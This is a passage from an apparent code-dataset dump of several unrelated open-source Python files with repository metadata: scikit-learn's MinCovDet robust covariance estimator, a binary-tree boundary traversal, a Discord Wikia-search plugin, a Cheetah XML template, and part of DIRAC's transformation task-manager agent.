current_subset, h_subset, n_trials,
select=n_best_sub, n_iter=2,
cov_computation_method=cov_computation_method,
random_state=random_state)
subset_slice = np.arange(i * n_best_sub, (i + 1) * n_best_sub)
all_best_locations[subset_slice] = best_locations_sub
all_best_covariances[subset_slice] = best_covariances_sub
# 2. Pool the candidate supports into a merged set
# (possibly the full dataset)
n_samples_merged = min(1500, n_samples)
h_merged = int(np.ceil(n_samples_merged *
(n_support / float(n_samples))))
if n_samples > 1500:
n_best_merged = 10
else:
n_best_merged = 1
# find the best couples (location, covariance) on the merged set
selection = random_state.permutation(n_samples)[:n_samples_merged]
locations_merged, covariances_merged, supports_merged, d = \
select_candidates(
X[selection], h_merged,
n_trials=(all_best_locations, all_best_covariances),
select=n_best_merged,
cov_computation_method=cov_computation_method,
random_state=random_state)
# 3. Finally get the overall best (locations, covariance) couple
if n_samples < 1500:
# directly get the best couple (location, covariance)
location = locations_merged[0]
covariance = covariances_merged[0]
support = np.zeros(n_samples, dtype=bool)
dist = np.zeros(n_samples)
support[selection] = supports_merged[0]
dist[selection] = d[0]
else:
# select the best couple on the full dataset
locations_full, covariances_full, supports_full, d = \
select_candidates(
X, n_support,
n_trials=(locations_merged, covariances_merged),
select=1,
cov_computation_method=cov_computation_method,
random_state=random_state)
location = locations_full[0]
covariance = covariances_full[0]
support = supports_full[0]
dist = d[0]
elif n_features > 1:
# 1. Find the 10 best couples (location, covariance)
# considering two iterations
n_trials = 30
n_best = 10
locations_best, covariances_best, _, _ = select_candidates(
X, n_support, n_trials=n_trials, select=n_best, n_iter=2,
cov_computation_method=cov_computation_method,
random_state=random_state)
# 2. Select the best couple on the full dataset amongst the 10
locations_full, covariances_full, supports_full, d = select_candidates(
X, n_support, n_trials=(locations_best, covariances_best),
select=1, cov_computation_method=cov_computation_method,
random_state=random_state)
location = locations_full[0]
covariance = covariances_full[0]
support = supports_full[0]
dist = d[0]
return location, covariance, support, dist
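    # Illustrative usage sketch (not part of the original module; only the
    # shapes below are asserted, not the values):
    #   >>> import numpy as np
    #   >>> rng = np.random.RandomState(42)
    #   >>> X = rng.randn(100, 2)
    #   >>> location, covariance, support, dist = fast_mcd(X, random_state=rng)
    #   >>> location.shape, covariance.shape, support.shape, dist.shape
    #   ((2,), (2, 2), (100,), (100,))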
class MinCovDet(EmpiricalCovariance):
"""Minimum Covariance Determinant (MCD): robust estimator of covariance.
The Minimum Covariance Determinant covariance estimator is to be applied
on Gaussian-distributed data, but could still be relevant on data
drawn from a unimodal, symmetric distribution. It is not meant to be used
with multi-modal data (the algorithm used to fit a MinCovDet object is
likely to fail in such a case).
One should consider projection pursuit methods to deal with multi-modal
datasets.
Parameters
----------
store_precision : bool
Specify if the estimated precision is stored.
assume_centered : Boolean
If True, the support of the robust location and the covariance
estimates is computed, and a covariance estimate is recomputed from
it, without centering the data.
        Useful to work with data whose mean is approximately, but not
        exactly, zero.
If False, the robust location and covariance are directly computed
with the FastMCD algorithm without additional treatment.
support_fraction : float, 0 < support_fraction < 1
The proportion of points to be included in the support of the raw
MCD estimate. Default is None, which implies that the minimum
value of support_fraction will be used within the algorithm:
[n_sample + n_features + 1] / 2
random_state : integer or numpy.RandomState, optional
The random generator used. If an integer is given, it fixes the
seed. Defaults to the global numpy random number generator.
Attributes
----------
`raw_location_` : array-like, shape (n_features,)
The raw robust estimated location before correction and re-weighting.
`raw_covariance_` : array-like, shape (n_features, n_features)
The raw robust estimated covariance before correction and re-weighting.
`raw_support_` : array-like, shape (n_samples,)
A mask of the observations that have been used to compute
the raw robust estimates of location and shape, before correction
and re-weighting.
`location_` : array-like, shape (n_features,)
Estimated robust location
`covariance_` : array-like, shape (n_features, n_features)
Estimated robust covariance matrix
`precision_` : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
`support_` : array-like, shape (n_samples,)
A mask of the observations that have been used to compute
the robust estimates of location and shape.
`dist_` : array-like, shape (n_samples,)
Mahalanobis distances of the training set (on which `fit` is called)
observations.
References
----------
.. [Rouseeuw1984] `P. J. Rousseeuw. Least median of squares regression.
J. Am Stat Ass, 79:871, 1984.`
.. [Rouseeuw1999] `A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS`
.. [Butler1993] `R. W. Butler, P. L. Davies and M. Jhun,
Asymptotics For The Minimum Covariance Determinant Estimator,
The Annals of Statistics, 1993, Vol. 21, No. 3, 1385-1400`
"""
_nonrobust_covariance = staticmethod(empirical_covariance)
def __init__(self, store_precision=True, assume_centered=False,
support_fraction=None, random_state=None):
self.store_precision = store_precision
self.assume_centered = assume_centered
self.support_fraction = support_fraction
self.random_state = random_state
def fit(self, X, y=None):
"""Fits a Minimum Covariance Determinant with the FastMCD algorithm.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples
and n_features is the number of features.
y : not used, present for API consistence purpose.
Returns
-------
self : object
Returns self.
"""
random_state = check_random_state(self.random_state)
n_samples, n_features = X.shape
# check that the empirical covariance is full rank
if (linalg.svdvals(np.dot(X.T, X)) > 1e-8).sum() != n_features:
warnings.warn("The covariance matrix associated to your dataset "
"is not full rank")
# compute and store raw estimates
raw_location, raw_covariance, raw_support, raw_dist = fast_mcd(
X, support_fraction=self.support_fraction,
cov_computation_method=self._nonrobust_covariance,
random_state=random_state)
if self.assume_centered:
raw_location = np.zeros(n_features)
raw_covariance = self._nonrobust_covariance(X[raw_support],
assume_centered=True)
# get precision matrix in an optimized way
precision = pinvh(raw_covariance)
raw_dist = np.sum(np.dot(X, precision) * X, 1)
self.raw_location_ = raw_location
self.raw_covariance_ = raw_covariance
self.raw_support_ = raw_support
self.location_ = raw_location
self.support_ = raw_support
self.dist_ = raw_dist
# obtain consistency at normal models
self.correct_covariance(X)
# re-weight estimator
self.reweight_covariance(X)
return self
def correct_covariance(self, data):
"""Apply a correction to raw Minimum Covariance Determinant estimates.
Correction using the empirical correction factor suggested
by Rousseeuw and Van Driessen in [Rouseeuw1984]_.
Parameters
----------
data : array-like, shape (n_samples, n_features)
The data matrix, with p features and n samples.
The data set must be the one which was used to compute
the raw estimates.
Returns
-------
covariance_corrected : array-like, shape (n_features, n_features)
Corrected robust covariance estimate.
"""
correction = np.median(self.dist_) / chi2(data.shape[1]).isf(0.5)
covariance_corrected = self.raw_covariance_ * correction
self.dist_ /= correction
return covariance_corrected
def reweight_covariance(self, data):
"""Re-weight raw Minimum Covariance Determinant estimates.
Re-weight observations using Rousseeuw's method (equivalent to
deleting outlying observations from the data set before
computing location and covariance estimates). [Rouseeuw1984]_
Parameters
----------
data : array-like, shape (n_samples, n_features)
The data matrix, with p features and n samples.
The data set must be the one which was used to compute
the raw estimates.
Returns
-------
location_reweighted : array-like, shape (n_features, )
Re-weighted robust location estimate.
covariance_reweighted : array-like, shape (n_features, n_features)
Re-weighted robust covariance estimate.
support_reweighted : array-like, type boolean, shape (n_samples,)
A mask of the observations that have been used to compute
the re-weighted robust location and covariance estimates.
"""
n_samples, n_features = data.shape
mask = self.dist_ < chi2(n_features).isf(0.025)
if self.assume_centered:
location_reweighted = np.zeros(n_features)
else:
location_reweighted = data[mask].mean(0)
covariance_reweighted = self._nonrobust_covariance(
data[mask], assume_centered=self.assume_centered)
support_reweighted = np.zeros(n_samples).astype(bool)
support_reweighted[mask] = True
self._set_covariance(covariance_reweighted)
self.location_ = location_reweighted
self.support_ = support_reweighted
X_centered = data - self.location_
self.dist_ = np.sum(
np.dot(X_centered, self.get_precision()) * X_centered, 1)
return location_reweighted, covariance_reweighted, support_reweighted
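        # Illustrative usage sketch (not part of the original module): fitting
        # on Gaussian data contaminated with gross outliers; the robust
        # location should stay near the true mean despite the contamination:
        #   >>> import numpy as np
        #   >>> rng = np.random.RandomState(0)
        #   >>> X = rng.randn(200, 2)
        #   >>> X[:20] += 10.            # inject 10% gross outliers
        #   >>> mcd = MinCovDet(random_state=0).fit(X)
        #   >>> bool(np.all(np.abs(mcd.location_) < 1.))
        #   True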
|
treycausey/scikit-learn
|
sklearn/covariance/robust_covariance.py
|
Python
|
bsd-3-clause
| 28,528
|
[
"Gaussian"
] |
e3afca6b9f085401bcac78ae83834240792c1bcf473d39dd4440dcaba983f7ec
|
class Node:
left = None
right = None
def __init__(self, data):
self.data = data
def triangleTransverse(root, result):
    # Boundary ("triangle") traversal: the root, the left edge top-down,
    # every leaf left-to-right, then the right edge bottom-up.
    result.append(root)
    visitLeft(root.left, True, result)
    visitRight(root.right, True, result)
def visitLeft(root, visit, result):
if root == None:
return
if visit or (root.left == None and root.right == None):
result.append(root)
visitLeft(root.left, True, result)
visitLeft(root.right, False, result)
def visitRight(root, visit, result):
if root == None:
return
visitRight(root.left, False, result)
visitRight(root.right, True, result)
if visit or (root.left == None and root.right == None):
result.append(root)
def generateBST(data, rootPos):
    # Despite the name, this builds a complete binary tree from the array
    # (heap-style indexing: children of i are 2i+1 and 2i+2), not a search tree.
if rootPos >= len(data):
return None
root = Node(data[rootPos])
root.left = generateBST(data, 2 * rootPos + 1)
root.right = generateBST(data, 2 * rootPos + 2)
return root
if __name__ == '__main__':
data = [x for x in range(15)]
root = generateBST(data, 0)
print(data)
result = []
triangleTransverse(root, result)
print([x.data for x in result])
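# For the 15-node complete tree above, the boundary traversal should print the
# root, the left edge, all leaves, then the right edge bottom-up:
#   [0, 1, 3, 7, 8, 9, 10, 11, 12, 13, 14, 6, 2]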
|
yubinbai/python_practice
|
triangleTransverse.py
|
Python
|
apache-2.0
| 1,165
|
[
"VisIt"
] |
d408efb3a718adf3c35dff2d66d35813f0231276ffc1dbba1c21a42f50322d66
|
# Copyright 2017 Starbot Discord Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Use the Wikia API to get Definitions'''
from api import command, message, plugin
from api.wikia import Wikia
import discord
import traceback
def wikia_get(wiki, search):
'''Fetch and return data from Wikia'''
starwiki = Wikia(wiki)
try:
results = starwiki.wikia_search(search)
page = starwiki.wikia_getpage(results[0]['id'])
section = page[0]
resultid = results[0]['id']
details = starwiki.wikia_getdetails(results[0]['id'])
# Some really stupid hacks to get the main image
img_thumb = details[str(resultid)]['thumbnail']
img_stuff = img_thumb.split("window-crop", 1)
img_stuff2 = img_stuff[1].split("?")
img = img_stuff[0][:-1] + "?" + img_stuff2[1]
except Exception as exc:
print(exc)
print(traceback.format_exc())
return message.Message("No result found for '{}'".format(search))
if len(section['content']) < 1:
return message.Message(body="No result found for '{}'".format(search))
embed = discord.Embed(color=discord.Color.green())
embed.set_author(name="Visit the full page here",
url=results[0]['url'],
icon_url='http://slot1.images.wikia.nocookie.net/__cb1493894030/common/skins/common/images/wiki.png')
embed.add_field(name=section['title'], value=section['content'][0]['text'])
embed.set_image(url=img)
return message.Message(embed=embed)
def onInit(plugin_in):
starwiki_command = command.Command(plugin_in, 'starwiki', shortdesc='Search the Star VS. Wikia')
wikia_command = command.Command(plugin_in, 'wikia', shortdesc='Search Wikia!')
return plugin.Plugin(plugin_in, 'starwiki', [starwiki_command, wikia_command])
async def onCommand(message_in):
if message_in.command == 'starwiki':
if message_in.body == '':
return message.Message(body='Usage:\nstarwiki [search term]')
else:
if message_in.body.startswith(" "):
message_in.body = message_in.body[1:]
return wikia_get('starvstheforcesofevil', message_in.body)
if message_in.command == 'wikia':
if message_in.body == '':
return message.Message(body='Usage:\nwikia [wikia name] [search term]')
input_split = message_in.body.split(' ', 2)
print(input_split)
if len(input_split) != 3:
return message.Message(body='Usage:\nwikia [wikia name] [search term]')
return wikia_get(input_split[1], input_split[2])
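    # Illustrative usage sketch (not part of the original plugin; the search
    # terms below are hypothetical, typed as Discord commands):
    #   starwiki Marco Diaz        -> searches the Star VS. wikia directly
    #   wikia fallout Nuka-Cola    -> searches the named wikia ("fallout")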
|
dhinakg/BitSTAR
|
plugins/wikia.py
|
Python
|
apache-2.0
| 3,152
|
[
"VisIt"
] |
cd0e315c66cc30952730309c0307c5211edca9109579a9a3fbbce515a5ab6e05
|
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
##################################################
## MODULE CONSTANTS
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1364979192.66491
__CHEETAH_genTimestamp__ = 'Wed Apr 3 17:53:12 2013'
__CHEETAH_src__ = '/home/fermi/Work/Model/tmsingle/openpli3.0/build-tmsingle/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-0.1+git1+279a2577c3bc6defebd4bf9e61a046dcf7f37c01-r0.72/git/plugin/controllers/views/web/mediaplayerremove.tmpl'
__CHEETAH_srcLastModified__ = 'Wed Apr 3 17:10:17 2013'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %s. Templates compiled before version %s must be recompiled.'%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class mediaplayerremove(Template):
##################################################
## CHEETAH GENERATED METHODS
def __init__(self, *args, **KWs):
super(mediaplayerremove, self).__init__(*args, **KWs)
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
def respond(self, trans=None):
## CHEETAH: main method generated for this template
if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
trans = self.transaction # is None unless self.awake() was called
if not trans:
trans = DummyTransaction()
_dummyTrans = True
else: _dummyTrans = False
write = trans.response().write
SL = self._CHEETAH__searchList
_filter = self._CHEETAH__currentFilter
########################################
## START - generated method body
_orig_filter_59764951 = _filter
filterName = u'WebSafe'
if self._CHEETAH__filters.has_key("WebSafe"):
_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
else:
_filter = self._CHEETAH__currentFilter = \
self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
write(u'''<?xml version="1.0" encoding="UTF-8"?>
<e2simplexmlresult>
\t<e2state>''')
_v = VFFSL(SL,"result",True) # u'$result' on line 4, col 11
if _v is not None: write(_filter(_v, rawExpr=u'$result')) # from line 4, col 11.
write(u'''</e2state>
\t<e2statetext>''')
_v = VFFSL(SL,"message",True) # u'$message' on line 5, col 15
if _v is not None: write(_filter(_v, rawExpr=u'$message')) # from line 5, col 15.
write(u'''</e2statetext>
</e2simplexmlresult>
''')
_filter = self._CHEETAH__currentFilter = _orig_filter_59764951
########################################
## END - generated method body
return _dummyTrans and trans.response().getvalue() or ""
##################################################
## CHEETAH GENERATED ATTRIBUTES
_CHEETAH__instanceInitialized = False
_CHEETAH_version = __CHEETAH_version__
_CHEETAH_versionTuple = __CHEETAH_versionTuple__
_CHEETAH_genTime = __CHEETAH_genTime__
_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
_CHEETAH_src = __CHEETAH_src__
_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
_mainCheetahMethod_for_mediaplayerremove= 'respond'
## END CLASS DEFINITION
if not hasattr(mediaplayerremove, '_initCheetahAttributes'):
templateAPIClass = getattr(mediaplayerremove, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(mediaplayerremove)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=mediaplayerremove()).run()
|
pli3/Openwebif
|
plugin/controllers/views/web/mediaplayerremove.py
|
Python
|
gpl-2.0
| 5,282
|
[
"VisIt"
] |
b3f1764f424cbd6e4d7affbdc2203b6637a4c14afe74ebe3253621131947a2b1
|
""" NOTA BENE: This agent should NOT be run alone. Instead, it serves as a base class for extensions.
The TaskManagerAgentBase is the base class to submit tasks to external systems,
monitor and update the tasks and file status in the transformation DB.
This agent is extended in WorkflowTaskAgent and RequestTaskAgent.
In case you want to further extend it you are required to follow the note on the
initialize method and on the _getClients method.
"""
__RCSID__ = "$Id$"
import time
import datetime
from Queue import Queue
from DIRAC import S_OK, gMonitor
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.Core.Utilities.ThreadPool import ThreadPool
from DIRAC.Core.Utilities.ThreadSafe import Synchronizer
from DIRAC.TransformationSystem.Client.FileReport import FileReport
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.TransformationSystem.Client.TaskManager import WorkflowTasks
from DIRAC.TransformationSystem.Client.TransformationClient import TransformationClient
from DIRAC.TransformationSystem.Agent.TransformationAgentsUtilities import TransformationAgentsUtilities
AGENT_NAME = 'Transformation/TaskManagerAgentBase'
gSynchro = Synchronizer()
class TaskManagerAgentBase( AgentModule, TransformationAgentsUtilities ):
""" To be extended. Please look at WorkflowTaskAgent and RequestTaskAgent.
"""
def __init__( self, *args, **kwargs ):
""" c'tor
Always call this in the extension agent
"""
AgentModule.__init__( self, *args, **kwargs )
TransformationAgentsUtilities.__init__( self )
self.transClient = None
self.transType = []
self.tasksPerLoop = 50
self.owner = ''
self.ownerGroup = ''
self.ownerDN = ''
# for the threading
self.transQueue = Queue()
self.transInQueue = []
self.transInThread = {}
#############################################################################
def initialize( self ):
""" Agent initialization.
        The extensions MUST provide the following data members in their initialize method:
        - TransformationClient objects (self.transClient),
        - the shifterProxy, if different from the default one set here ('ProductionManager'),
        - the list of transformation types to be considered (self.transType)
"""
gMonitor.registerActivity( "SubmittedTasks", "Automatically submitted tasks", "Transformation Monitoring", "Tasks",
gMonitor.OP_ACUM )
# Default clients
self.transClient = TransformationClient()
#setting up the threading
maxNumberOfThreads = self.am_getOption( 'maxNumberOfThreads', 15 )
threadPool = ThreadPool( maxNumberOfThreads, maxNumberOfThreads )
self.log.verbose( "Multithreaded with %d threads" % maxNumberOfThreads )
for i in xrange( maxNumberOfThreads ):
threadPool.generateJobAndQueueIt( self._execute, [i] )
return S_OK()
def finalize( self ):
""" graceful finalization
"""
if self.transInQueue:
self._logInfo( "Wait for threads to get empty before terminating the agent (%d tasks)" % len( self.transInThread ) )
self.transInQueue = []
while self.transInThread:
time.sleep( 2 )
self.log.info( "Threads are empty, terminating the agent..." )
return S_OK()
#############################################################################
def execute( self ):
""" The TaskManagerBase execution method is just filling the Queues of transformations that need to be processed
"""
operationsOnTransformationDict = {}
# Determine whether the task status is to be monitored and updated
enableTaskMonitor = self.am_getOption( 'MonitorTasks', '' )
if not enableTaskMonitor:
self.log.verbose( "Monitoring of tasks is disabled. To enable it, create the 'MonitorTasks' option" )
else:
# Get the transformations for which the tasks have to be updated
status = self.am_getOption( 'UpdateTasksStatus', ['Active', 'Completing', 'Stopped'] )
transformations = self._selectTransformations( transType = self.transType, status = status, agentType = [] )
if not transformations['OK']:
self.log.warn( "Could not select transformations: %s" % transformations['Message'] )
else:
transformationIDsAndBodies = dict( [( transformation['TransformationID'],
transformation['Body'] ) for transformation in transformations['Value']] )
for transID, body in transformationIDsAndBodies.iteritems():
operationsOnTransformationDict[transID] = {'Body': body, 'Operations': ['updateTaskStatus']}
# Determine whether the task files status is to be monitored and updated
enableFileMonitor = self.am_getOption( 'MonitorFiles', '' )
if not enableFileMonitor:
self.log.verbose( "Monitoring of files is disabled. To enable it, create the 'MonitorFiles' option" )
else:
# Get the transformations for which the files have to be updated
status = self.am_getOption( 'UpdateFilesStatus', ['Active', 'Completing', 'Stopped'] )
transformations = self._selectTransformations( transType = self.transType, status = status, agentType = [] )
if not transformations['OK']:
self.log.warn( "Could not select transformations: %s" % transformations['Message'] )
else:
transformationIDsAndBodies = dict( [( transformation['TransformationID'],
transformation['Body'] ) for transformation in transformations['Value']] )
for transID, body in transformationIDsAndBodies.iteritems():
if transID in operationsOnTransformationDict:
operationsOnTransformationDict[transID]['Operations'].append('updateFileStatus')
else:
operationsOnTransformationDict[transID] = {'Body': body, 'Operations': ['updateFileStatus']}
# Determine whether the checking of reserved tasks is to be performed
enableCheckReserved = self.am_getOption( 'CheckReserved', '' )
if not enableCheckReserved:
self.log.verbose( "Checking of reserved tasks is disabled. To enable it, create the 'CheckReserved' option" )
else:
      # Get the transformations for which the check of reserved tasks has to be performed
status = self.am_getOption( 'CheckReservedStatus', ['Active', 'Completing', 'Stopped'] )
transformations = self._selectTransformations( transType = self.transType, status = status, agentType = [] )
if not transformations['OK']:
self.log.warn( "Could not select transformations: %s" % transformations['Message'] )
else:
transformationIDsAndBodies = dict( [( transformation['TransformationID'],
transformation['Body'] ) for transformation in transformations['Value']] )
for transID, body in transformationIDsAndBodies.iteritems():
if transID in operationsOnTransformationDict:
operationsOnTransformationDict[transID]['Operations'].append( 'checkReservedTasks' )
else:
operationsOnTransformationDict[transID] = {'Body': body, 'Operations': ['checkReservedTasks']}
# Determine whether the submission of tasks is to be performed
enableSubmission = self.am_getOption( 'SubmitTasks', '' )
if not enableSubmission:
self.log.verbose( "Submission of tasks is disabled. To enable it, create the 'SubmitTasks' option" )
else:
# getting the credentials for submission
res = getProxyInfo( False, False )
if not res['OK']:
self.log.error( "Failed to determine credentials for submission", res['Message'] )
return res
proxyInfo = res['Value']
self.owner = proxyInfo['username']
self.ownerGroup = proxyInfo['group']
self.ownerDN = proxyInfo['identity']
self.log.info( "Tasks will be submitted with the credentials %s:%s" % ( self.owner, self.ownerGroup ) )
      # Get the transformations for which tasks have to be submitted
status = self.am_getOption( 'SubmitStatus', ['Active', 'Completing'] )
transformations = self._selectTransformations( transType = self.transType, status = status )
if not transformations['OK']:
self.log.warn( "Could not select transformations: %s" % transformations['Message'] )
else:
# Get the transformations which should be submitted
self.tasksPerLoop = self.am_getOption( 'TasksPerLoop', self.tasksPerLoop )
transformationIDsAndBodies = dict( [( transformation['TransformationID'],
transformation['Body'] ) for transformation in transformations['Value']] )
for transID, body in transformationIDsAndBodies.iteritems():
if transID in operationsOnTransformationDict:
operationsOnTransformationDict[transID]['Operations'].append( 'submitTasks' )
else:
operationsOnTransformationDict[transID] = {'Body': body, 'Operations': ['submitTasks']}
self._fillTheQueue( operationsOnTransformationDict )
return S_OK()
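  # Illustrative sketch (editor's note, not part of the original agent): after
  # execute() has run, operationsOnTransformationDict maps each selected
  # transformation ID to its body and the list of operations queued for it, e.g.
  #
  #   {1234: {'Body': '<workflow xml>',
  #           'Operations': ['updateTaskStatus', 'updateFileStatus', 'submitTasks']}}
  #
  # Each entry of 'Operations' is the name of a method of this class, which
  # _execute() resolves with getattr() and invokes in order.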
def _selectTransformations( self, transType = [], status = ['Active', 'Completing'], agentType = ['Automatic'] ):
""" get the transformations
"""
selectCond = {}
if status:
selectCond['Status'] = status
if transType:
selectCond['Type'] = transType
if agentType:
selectCond['AgentType'] = agentType
res = self.transClient.getTransformations( condDict = selectCond )
if not res['OK']:
self.log.error( "Failed to get transformations: %s" % res['Message'] )
elif not res['Value']:
self.log.verbose( "No transformations found" )
else:
self.log.verbose( "Obtained %d transformations" % len( res['Value'] ) )
return res
def _fillTheQueue( self, operationsOnTransformationsDict ):
""" Just fill the queue with the operation to be done on a certain transformation
"""
count = 0
for transID, bodyAndOps in operationsOnTransformationsDict.iteritems():
if transID not in self.transInQueue:
count += 1
self.transInQueue.append( transID )
self.transQueue.put( {transID: bodyAndOps} )
self.log.info( "Out of %d transformations, %d put in thread queue" % ( len( operationsOnTransformationsDict ),
count ) )
#############################################################################
def _getClients( self ):
""" returns the clients used in the threads - this is another function that should be extended.
The clients provided here are defaults, and should be adapted
"""
threadTransformationClient = TransformationClient()
threadTaskManager = WorkflowTasks() # this is for wms tasks, replace it with something else if needed
return {'TransformationClient': threadTransformationClient,
'TaskManager': threadTaskManager}
def _execute( self, threadID ):
""" This is what runs inside the threads, in practice this is the function that does the real stuff
"""
# Each thread will have its own clients
clients = self._getClients()
while True:
      transIDOPBody = self.transQueue.get()
      # Pre-set these here, so that the finally clause below cannot fail with a NameError
      startTime = datetime.datetime.utcnow()
      transID = None
      try:
        transID = transIDOPBody.keys()[0]
operations = transIDOPBody[transID]['Operations']
if transID not in self.transInQueue:
self._logWarn( "Got a transf not in transInQueue...?", method = '_execute', transID = transID )
break
self.transInThread[transID] = ' [Thread%d] [%s] ' % ( threadID, str( transID ) )
for operation in operations:
self._logInfo( "Starting processing operation %s" % operation, method = '_execute', transID = transID )
startTime = datetime.datetime.utcnow()
res = getattr( self, operation )( transIDOPBody, clients )
if not res['OK']:
self._logError( "Failed to %s: %s" % ( operation, res['Message'] ), method = '_execute', transID = transID )
self._logInfo( "Processed operation %s" % operation, method = '_execute', transID = transID )
except Exception, x:
self._logException( '%s' % x, transID = transID )
finally:
if not transID:
transID = 'None'
self._logInfo( "Processed transformation in %s" % ( datetime.datetime.utcnow() - startTime ),
method = '_execute', transID = transID )
self._logVerbose( "%d transformations still in queue" % ( len( self.transInQueue ) - 1 ),
method = '_execute', transID = transID )
self.transInThread.pop( transID, None )
if transID in self.transInQueue:
self.transInQueue.remove( transID )
self._logDebug( "transInQueue = %s" % str( self.transInQueue ), method = '_execute', transID = transID )
#############################################################################
# real operations done
def updateTaskStatus( self, transIDOPBody, clients ):
""" Updates the task status
"""
transID = transIDOPBody.keys()[0]
# Get the tasks which are in an UPDATE state
updateStatus = self.am_getOption( 'TaskUpdateStatus', ['Checking', 'Deleted', 'Killed', 'Staging', 'Stalled',
'Matched', 'Scheduled', 'Rescheduled', 'Completed',
'Submitted', 'Assigned', 'Received',
'Waiting', 'Running'] )
condDict = {"TransformationID":transID, "ExternalStatus":updateStatus}
timeStamp = str( datetime.datetime.utcnow() - datetime.timedelta( minutes = 10 ) )
transformationTasks = clients['TransformationClient'].getTransformationTasks( condDict = condDict,
older = timeStamp,
timeStamp = 'LastUpdateTime' )
self._logDebug( "getTransformationTasks(%s) return value: %s" % ( str( condDict ), str( transformationTasks ) ),
method = 'updateTaskStatus', transID = transID )
if not transformationTasks['OK']:
self._logError( "Failed to get tasks to update: %s" % transformationTasks['Message'],
method = "updateTaskStatus", transID = transID )
return transformationTasks
if not transformationTasks['Value']:
self._logVerbose( "No tasks found to update", method = "updateTaskStatus", transID = transID )
return transformationTasks
self._logVerbose( "Getting %d tasks status" % len( transformationTasks['Value'] ),
method = "updateTaskStatus", transID = transID )
submittedTaskStatus = clients['TaskManager'].getSubmittedTaskStatus( transformationTasks['Value'] )
self._logDebug( "getSubmittedTaskStatus return value: %s" % str( submittedTaskStatus ),
method = 'updateTaskStatus', transID = transID )
if not submittedTaskStatus['OK']:
self._logError( "Failed to get updated task states: %s" % submittedTaskStatus['Message'],
method = "updateTaskStatus", transID = transID )
return submittedTaskStatus
statusDict = submittedTaskStatus['Value']
if not statusDict:
self._logInfo( "No tasks to update", method = "updateTaskStatus", transID = transID )
return submittedTaskStatus
else:
for status in sorted( statusDict ):
taskIDs = statusDict[status]
self._logInfo( "Updating %d task(s) to %s" % ( len( taskIDs ), status ),
method = "updateTaskStatus", transID = transID )
setTaskStatus = clients['TransformationClient'].setTaskStatus( transID, taskIDs, status )
self._logDebug( "setTaskStatus return value: %s" % str( setTaskStatus ),
method = 'updateTaskStatus', transID = transID )
if not setTaskStatus['OK']:
self._logError( "Failed to update task status for transformation: %s" % setTaskStatus['Message'],
method = "updateTaskStatus", transID = transID )
return setTaskStatus
return S_OK()
def updateFileStatus( self, transIDOPBody, clients ):
""" Update the files status
"""
transID = transIDOPBody.keys()[0]
timeStamp = str( datetime.datetime.utcnow() - datetime.timedelta( minutes = 10 ) )
condDict = {'TransformationID' : transID, 'Status' : ['Assigned']}
transformationFiles = clients['TransformationClient'].getTransformationFiles( condDict = condDict,
older = timeStamp, timeStamp = 'LastUpdate' )
self._logDebug( "getTransformationFiles(%s) return value: %s" % ( str( condDict ), transformationFiles ),
method = 'updateFileStatus', transID = transID )
if not transformationFiles['OK']:
self._logError( "Failed to get transformation files to update: %s" % transformationFiles['Message'],
method = 'updateFileStatus' )
return transformationFiles
if not transformationFiles['Value']:
self._logInfo( "No files to be updated", transID = transID, method = 'updateFileStatus' )
return transformationFiles
submittedFileStatus = clients['TaskManager'].getSubmittedFileStatus( transformationFiles['Value'] )
self._logDebug( "getSubmittedFileStatus return value: %s" % submittedFileStatus,
method = 'updateFileStatus', transID = transID )
if not submittedFileStatus['OK']:
self._logError( "Failed to get updated file states for transformation: %s" % submittedFileStatus['Message'],
transID = transID, method = 'updateFileStatus' )
return submittedFileStatus
statusDict = submittedFileStatus['Value']
if not statusDict:
self._logInfo( "No file states to be updated", transID = transID, method = 'updateFileStatus' )
return submittedFileStatus
fileReport = FileReport( server = clients['TransformationClient'].getServer() )
